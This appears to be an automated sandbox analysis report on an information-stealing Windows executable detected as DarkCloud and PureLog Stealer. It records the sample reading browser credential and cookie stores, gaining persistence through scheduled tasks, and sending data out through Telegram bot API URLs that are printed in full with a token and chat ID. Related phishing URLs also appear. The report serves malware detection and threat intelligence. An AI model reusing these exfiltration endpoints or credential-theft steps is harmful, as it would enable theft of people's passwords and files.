                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\ONBQCLYSPU.pdf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\PSAMNLJHZW.docx VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\PWZOQIFCAN.pdf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\TQDGENUHWP.docx VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\TQDGENUHWP.docx VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\WKXEWIOTXI.docx VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\WKXEWIOTXI.docx VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\WKXEWIOTXI.pdf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\WKXEWIOTXI.pdf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\WUTJSCBCFX.xlsx VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\XZXHAVGRAG.docx VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\XZXHAVGRAG.xlsx VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\YPSIACHYXW.docx VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\ZGGKNSUKOP.pdf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\ZGGKNSUKOP.xlsx VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\ZSSZYEFYMU.docx VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\ZSSZYEFYMU.docx VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\ZSSZYEFYMU.xlsx VolumeInformation
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected DarkCloud
                    Source: Yara matchFile source: 0.2.oS6KsQIqJxe038Y.exe.3e2c4c8.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.oS6KsQIqJxe038Y.exe.485bd28.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.oS6KsQIqJxe038Y.exe.485bd28.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.oS6KsQIqJxe038Y.exe.3e2c4c8.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000A.00000002.3403613356.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2265406879.000000000485B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2265406879.0000000003D19000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: oS6KsQIqJxe038Y.exe PID: 6524, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: oS6KsQIqJxe038Y.exe PID: 4676, type: MEMORYSTR
                    Yara detected PureLog Stealer
                    Source: Yara matchFile source: 0.2.oS6KsQIqJxe038Y.exe.5600000.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.oS6KsQIqJxe038Y.exe.5600000.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.2267554201.0000000005600000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2265406879.0000000003D19000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data

                    Remote Access Functionality

                    barindex
                    Yara detected DarkCloud
                    Source: Yara matchFile source: 0.2.oS6KsQIqJxe038Y.exe.3e2c4c8.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.oS6KsQIqJxe038Y.exe.485bd28.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.oS6KsQIqJxe038Y.exe.485bd28.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.oS6KsQIqJxe038Y.exe.3e2c4c8.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000A.00000002.3403613356.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2265406879.000000000485B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2265406879.0000000003D19000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: oS6KsQIqJxe038Y.exe PID: 6524, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: oS6KsQIqJxe038Y.exe PID: 4676, type: MEMORYSTR
                    Yara detected PureLog Stealer
                    Source: Yara matchFile source: 0.2.oS6KsQIqJxe038Y.exe.5600000.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.oS6KsQIqJxe038Y.exe.5600000.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.2267554201.0000000005600000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2265406879.0000000003D19000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts221
                    Windows Management Instrumentation                    		1
                    Scheduled Task/Job                    		112
                    Process Injection                    		1
                    Masquerading                    		1
                    OS Credential Dumping                    		221
                    Security Software Discovery                    		Remote Services1
                    Input Capture                    		1
                    Web Service                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    Scheduled Task/Job                    		1
                    DLL Side-Loading                    		1
                    Scheduled Task/Job                    		11
                    Disable or Modify Tools                    		1
                    Input Capture                    		2
                    Process Discovery                    		Remote Desktop Protocol1
                    Archive Collected Data                    		11
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                    DLL Side-Loading                    		51
                    Virtualization/Sandbox Evasion                    		Security Account Manager51
                    Virtualization/Sandbox Evasion                    		SMB/Windows Admin Shares1
                    Data from Local System                    		1
                    Ingress Tool Transfer                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook112
                    Process Injection                    		NTDS1
                    Application Window Discovery                    		Distributed Component Object ModelInput Capture3
                    Non-Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
                    Obfuscated Files or Information                    		LSA Secrets1
                    System Network Configuration Discovery                    		SSHKeylogging14
                    Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts22
                    Software Packing                    		Cached Domain Credentials2
                    File and Directory Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    DLL Side-Loading                    		DCSync23
                    System Information Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1564115 Sample: oS6KsQIqJxe038Y.exe Startdate: 27/11/2024 Architecture: WINDOWS Score: 100 46 api.telegram.org 2->46 48 showip.net 2->48 54 Suricata IDS alerts for network traffic 2->54 56 Found malware configuration 2->56 58 Malicious sample detected (through community Yara rule) 2->58 62 11 other signatures 2->62 8 oS6KsQIqJxe038Y.exe 7 2->8         started        12 XgbXowhljC.exe 2->12         started        signatures3 60 Uses the Telegram API (likely for C&C communication) 46->60 process4 file5 38 C:\Users\user\AppData\...\XgbXowhljC.exe, PE32 8->38 dropped 40 C:\Users\...\XgbXowhljC.exe:Zone.Identifier, ASCII 8->40 dropped 42 C:\Users\user\AppData\Local\...\tmpF214.tmp, XML 8->42 dropped 44 C:\Users\user\...\oS6KsQIqJxe038Y.exe.log, ASCII 8->44 dropped 64 Uses schtasks.exe or at.exe to add and modify task schedules 8->64 66 Adds a directory exclusion to Windows Defender 8->66 68 Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes) 8->68 14 powershell.exe 23 8->14         started        17 powershell.exe 23 8->17         started        19 oS6KsQIqJxe038Y.exe 27 8->19         started        21 schtasks.exe 1 8->21         started        70 Multi AV Scanner detection for dropped file 12->70 72 Machine Learning detection for dropped file 12->72 74 Writes or reads registry keys via WMI 12->74 76 Injects a PE file into a foreign processes 12->76 23 XgbXowhljC.exe 12->23         started        26 schtasks.exe 12->26         started        signatures6 process7 dnsIp8 78 Loading BitLocker PowerShell Module 14->78 28 conhost.exe 14->28         started        30 conhost.exe 17->30         started        32 WmiPrvSE.exe 19->32         started        34 conhost.exe 21->34         started        50 api.telegram.org 149.154.167.220, 443, 49758, 49786 TELEGRAMRU United Kingdom 23->50 52 showip.net 162.55.60.2, 49740, 49749, 80 ACPCA United States 23->52 80 Tries to harvest and steal browser information (history, passwords, etc) 23->80 36 conhost.exe 26->36         started        signatures9 process10

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    oS6KsQIqJxe038Y.exe66%ReversingLabsByteCode-MSIL.Trojan.Heracles
                    oS6KsQIqJxe038Y.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\XgbXowhljC.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\XgbXowhljC.exe66%ReversingLabsByteCode-MSIL.Trojan.Heracles

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    http://showip.net/e-0%Avira URL Cloudsafe
                    https://www.trtworld.com/#frmActiveBrowsers0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    showip.net
                    		162.55.60.2
                    		truefalse
                      		high
                      api.telegram.org
                      		149.154.167.220
                      		truefalse
                        		high

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://api.telegram.org/bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-FG:::user-PC\user\8.46.123.228false
                          		high
                          https://api.telegram.org/bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-KL:::user-PC\user\8.46.123.228false
                            		high
                            https://api.telegram.org/bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-SC:::user-PC\user\8.46.123.228false
                              		high

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              https://www.mgm.gov.tr/?il=manisaoS6KsQIqJxe038Y.exe, XgbXowhljC.exe.0.drfalse
                                		high
                                https://api.telegram.org/mplatesXgbXowhljC.exe, 0000000E.00000002.3407510611.0000000004010000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://api.telegram.org/api.telegram.orgoS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://api.telegram.org/bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732XgbXowhljC.exe, 0000000E.00000002.3408140983.00000000040A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://api.telegram.org/ocUniqueoS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://api.telegram.org/botoS6KsQIqJxe038Y.exe, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3403613356.0000000000401000.00000040.00000400.00020000.00000000.sdmpfalse
                                          		high
                                          https://api.telegram.org/bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=.BMPoS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://api.telegram.org/0XgbXowhljC.exe, 0000000E.00000002.3405115828.0000000001277000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://api.telegram.org/.oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://api.telegram.org/oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E6B000.00000004.00000020.00020000.00000000.sdmp, XgbXowhljC.exe, 0000000E.00000002.3407301740.0000000003FBE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://api.telegram.org/8XgbXowhljC.exe, 0000000E.00000002.3405115828.0000000001277000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://api.telegram.org/AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1FsoS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmp, XgbXowhljC.exe, 0000000E.00000002.3407301740.0000000003FBE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namePXgbXowhljC.exe, 0000000B.00000002.2291217651.0000000002D21000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://api.telegram.org/ZXgbXowhljC.exe, 0000000E.00000002.3407301740.0000000003FBE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://www.tcmb.gov.tr/wps/wcm/connect/tr/tcmboS6KsQIqJxe038Y.exe, XgbXowhljC.exe.0.drfalse
                                                            		high
                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameoS6KsQIqJxe038Y.exe, 00000000.00000002.2264000411.0000000002D11000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://api.telegram.org/bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=toS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://showip.net/oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000F27000.00000004.00000020.00020000.00000000.sdmp, XgbXowhljC.exe, 0000000E.00000002.3405115828.0000000001259000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://showip.net/e-oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000F27000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://www.trtworld.com/#frmActiveBrowsersoS6KsQIqJxe038Y.exe, XgbXowhljC.exe.0.drfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown

                                                                  World Map of Contacted IPs

                                                                  • No. of IPs < 25%
                                                                  • 25% < No. of IPs < 50%
                                                                  • 50% < No. of IPs < 75%
                                                                  • 75% < No. of IPs

                                                                  Public IPs

                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                  149.154.167.220
                                                                  		api.telegram.orgUnited Kingdom
                                                                  		62041TELEGRAMRUfalse
                                                                  162.55.60.2
                                                                  		showip.netUnited States
                                                                  		35893ACPCAfalse

                                                                  General Information

                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                  Analysis ID:1564115
                                                                  Start date and time:2024-11-27 20:45:10 +01:00
                                                                  Joe Sandbox product:CloudBasic
                                                                  Overall analysis duration:0h 7m 27s
                                                                  Hypervisor based Inspection enabled:false
                                                                  Report type:full
                                                                  Cookbook file name:default.jbs
                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                  Number of analysed new started processes analysed:18
                                                                  Number of new started drivers analysed:0
                                                                  Number of existing processes analysed:0
                                                                  Number of existing drivers analysed:0
                                                                  Number of injected processes analysed:0
                                                                  Technologies:
                                                                  • HCA enabled
                                                                  • EGA enabled
                                                                  • AMSI enabled
                                                                  Analysis Mode:default
                                                                  Analysis stop reason:Timeout
                                                                  Sample name:oS6KsQIqJxe038Y.exe
                                                                  Detection:MAL
                                                                  Classification:mal100.troj.spyw.evad.winEXE@19/52@3/2
                                                                  EGA Information:
                                                                  • Successful, ratio: 50%
                                                                  HCA Information:
                                                                  • Successful, ratio: 98%
                                                                  • Number of executed functions: 140
                                                                  • Number of non-executed functions: 8
                                                                  Cookbook Comments:
                                                                  • Found application associated with file extension: .exe

                                                                  Warnings

                                                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe, svchost.exe
                                                                  • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, login.live.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                  • Execution Graph export aborted for target XgbXowhljC.exe, PID 4848 because it is empty
                                                                  • Execution Graph export aborted for target oS6KsQIqJxe038Y.exe, PID 4676 because it is empty
                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                  • Report size getting too big, too many NtCreateKey calls found.
                                                                  • Report size getting too big, too many NtOpenFile calls found.
                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                  • VT rate limit hit for: oS6KsQIqJxe038Y.exe

                                                                  Simulations

                                                                  Behavior and APIs

                                                                  TimeTypeDescription
                                                                  14:46:14API Interceptor2005x Sleep call for process: oS6KsQIqJxe038Y.exe modified
                                                                  14:46:17API Interceptor26x Sleep call for process: powershell.exe modified
                                                                  14:46:24API Interceptor2000x Sleep call for process: XgbXowhljC.exe modified
                                                                  20:46:24Task SchedulerRun new task: XgbXowhljC path: C:\Users\user\AppData\Roaming\XgbXowhljC.exe

                                                                  Joe Sandbox View / Context

                                                                  IPs

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  149.154.167.220hesaphareketi-01-27112024.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    Teklif_PDF.exeGet hashmaliciousMassLogger RAT, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                      Siparis po 1198624 _#U0130zmir #U0130stinyepark Projesi.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                        file.exeGet hashmaliciousDynamic StealerBrowse
                                                                          file.exeGet hashmaliciousUnknownBrowse
                                                                            eInvoice.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                              Po-5865A.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                https://u48346967.ct.sendgrid.net/ls/click?upn=u001.A0zc-2BEvyk1Wl-2FMpdhEZeKOri2-2FGgH2RTzsX65VEcnN5SaLyl0UT8OMFIJrPp3PpoUM6xY28FQ2N7ftppG5RudDteJXD3BQZCthiPi2c2ALFGlSPfhe-2FcxhcglgWUQb-2BQESuvSP1z-2Bm6yiScj3t94MRtf0LYKB9CrrSBugAIE2LYG8LmYpSkH60B-2FMZ3-2BrvjbSA4-2FMKq-2BcyWHr8EPqNcLYpXKIa0eXlisYAn-2BUQ7zduW7tl-2BbLdZxK7-2F64kDFJWjAhA5-2BQkfVJJJox5IXYuhbutR70TtJJBVXs1-2BGpCmHbl-2BDNTOjQhDGBdV0GcWgnTqzbjbnvsgf-2Be0TXvdX5Smk9Cf3e70Q9X7CCHEUK7n5Iz83JVMEOM-2Fand-2B23jD1RrWlwwdn356TAiWPO93YBbqf0SO77Y7wdjJ1b9FY9HkvpCMIajIk8oGDIkalcOsvDrkfpAsNhyAACh29yO16Fg-2FM5u3K-2FXbE9Ex7FVSxGjaaC9sm3ZFKCHARATSNuZ5Fje0JCvs-2FuHNf8MhNMkgfl0FBuxcFtouETvn8R0InFl5AtNwGS6Afu60jlKV5PLEF8GeumMl4Zuoh2K-2F2yPQclKc1crfKqXCOnUQUzOQ7UyIpV0r3b47s6ht1AVAEPjV3zoZw9RLpCyXdGkoI8n06eY007Qg9WwLvy7We-2BQcl-2FyYQ4K56RiNFy6ideRccN4rvz5rlbEO4SM2GPwiXl06aWh1Z8A-3D-3DayVm_7jfNTkQybv-2BVetjXJenftZxQwKjBczDJqHH7EaznqVv3v2Dkt-2FIgZwJNXIp-2FyMqSeIPtfO34Zh0BJrBXMe8iDwc4F5cynKVd9U-2BCWNvBhYWndn5YPpcrm9EU-2BINyUV9MYoGCAzxOgZamtaAmmSvzUZGau9tG0E7vfYFw2WK2ssr4DmY5GXF-2BgMFUeEjp9HrYndaGnf0PXO4kOxtTViX7PlJWm1KFcSCvZKxLAfO2BkacR3B5XEdLDYpCUp92-2FH-2FHkhtVIRx1yIxGh6p91O9ZVon-2F9iC9RT46lS0PoWolD8OcxI1a8fShT6Hp4QWQfdHwSEy80yGx3wt6ImkGF4v9TXkQs-2Fsq-2FVFPoSnqaJLrItk8v5xWRdhyDRHKG-2BDTjP6JA9QphZ2npWlpDplGG-2B7VPrWDZBnEu36loOA6wRajUleT-2BwoMeGN4STY52Ur27KRveKCJr82irXKChZwqe-2BaUbmDOUwyLdpuYgAFKsd-2BPzSGCG9KIfFEO3qjrRe-2Ft9WxzxVxFb7rM1MFj1q2QSoqqpSZyyIO6o9dQWLpdkFrZCNwiV9o0NuRkda7B0vqLodHzU4jQ4E2ZVSRC2Gc87k08fCi-2BBF7Dmw-2F3-2FQYcQ-2BUHjUCqjlkaHmxOAI7-2FhdUS1Wb7BgsTAm-2Ft-2BvXBxupXitGd4JcEDUe0WuuxdFLUCWiEzHEB6DI0pZnKp0MjuL6t-2FHdSSyJSuzZQLJWoI1iWOBow7nssQ-2FtT6mq0c4kg9bIepJUAi8J12B9eClWiTZDtbREopSTPA0TrHAq8mBDFqCQ0MfGj13zUsahv2EEEPM5XcF8DfOVu-2BwcjmThtw28U2MS5BiDqE1Pwg-2BCEH40qmpHlF5lcXadw9ehGsQbMKc0VYqPjH2-2BLldks6uo-2Fln-2BeeieWNP8wXJfHHwtYJznNHWBqLw-3D-3DGet hashmaliciousHTMLPhisherBrowse
                                                                                  z705688y7t7tgggju97867756576.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.ro/url?q=https://digitalplatform-admin-p.azurewebsites.net/external-link/?targetURL=https://www.google.nl/url?q=ZFCKQSES42J831UCOWMB4MEAK36T3IE7YuQiApLjODz3yh4nNeW8uuQi&rct=XS%25SERIAL%2525wDnNeW8yycT&sa=t&esrc=nNeW8F%25SERIAL%2525A0xys8Em2FL&source=&cd=tS6T8%25SERIAL%2525Tiw9XH&cad=XpPkDfJX%25SERIAL%2525VS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp/www.monument-funerar.ro/admin/view/image/payment/#test@example.deGet hashmaliciousHTMLPhisherBrowse
                                                                                      162.55.60.2Purchase Order AB013058.PDF.exeGet hashmaliciousDarkCloud, PureLog StealerBrowse
                                                                                      • showip.net/
                                                                                      MSM8C42iAN.exeGet hashmaliciousDarkCloudBrowse
                                                                                      • showip.net/
                                                                                      wMy37vlfvz.exeGet hashmaliciousDarkCloudBrowse
                                                                                      • showip.net/
                                                                                      8m65n7ieJC.exeGet hashmaliciousDarkCloudBrowse
                                                                                      • showip.net/
                                                                                      Factura modificada____678979879.exeGet hashmaliciousDarkCloudBrowse
                                                                                      • showip.net/
                                                                                      Pago SEPA.pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                                      • showip.net/
                                                                                      Lista de cotizaciones.exeGet hashmaliciousDarkCloudBrowse
                                                                                      • showip.net/
                                                                                      New Order___________pdf.exeGet hashmaliciousDarkCloudBrowse
                                                                                      • showip.net/
                                                                                      Payment Receipt Attached PDF.exeGet hashmaliciousGuLoaderBrowse
                                                                                      • showip.net/
                                                                                      Payment Receipt Attached PDF.exeGet hashmaliciousGuLoaderBrowse
                                                                                      • showip.net/

                                                                                      Domains

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      showip.netPurchase Order AB013058.PDF.exeGet hashmaliciousDarkCloud, PureLog StealerBrowse
                                                                                      • 162.55.60.2
                                                                                      MSM8C42iAN.exeGet hashmaliciousDarkCloudBrowse
                                                                                      • 162.55.60.2
                                                                                      wMy37vlfvz.exeGet hashmaliciousDarkCloudBrowse
                                                                                      • 162.55.60.2
                                                                                      8m65n7ieJC.exeGet hashmaliciousDarkCloudBrowse
                                                                                      • 162.55.60.2
                                                                                      Factura modificada____678979879.exeGet hashmaliciousDarkCloudBrowse
                                                                                      • 162.55.60.2
                                                                                      Pago SEPA.pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                                      • 162.55.60.2
                                                                                      Lista de cotizaciones.exeGet hashmaliciousDarkCloudBrowse
                                                                                      • 162.55.60.2
                                                                                      New Order___________pdf.exeGet hashmaliciousDarkCloudBrowse
                                                                                      • 162.55.60.2
                                                                                      Payment Receipt Attached PDF.exeGet hashmaliciousGuLoaderBrowse
                                                                                      • 162.55.60.2
                                                                                      Payment Receipt Attached PDF.exeGet hashmaliciousGuLoaderBrowse
                                                                                      • 162.55.60.2
                                                                                      api.telegram.orghesaphareketi-01-27112024.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      Teklif_PDF.exeGet hashmaliciousMassLogger RAT, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
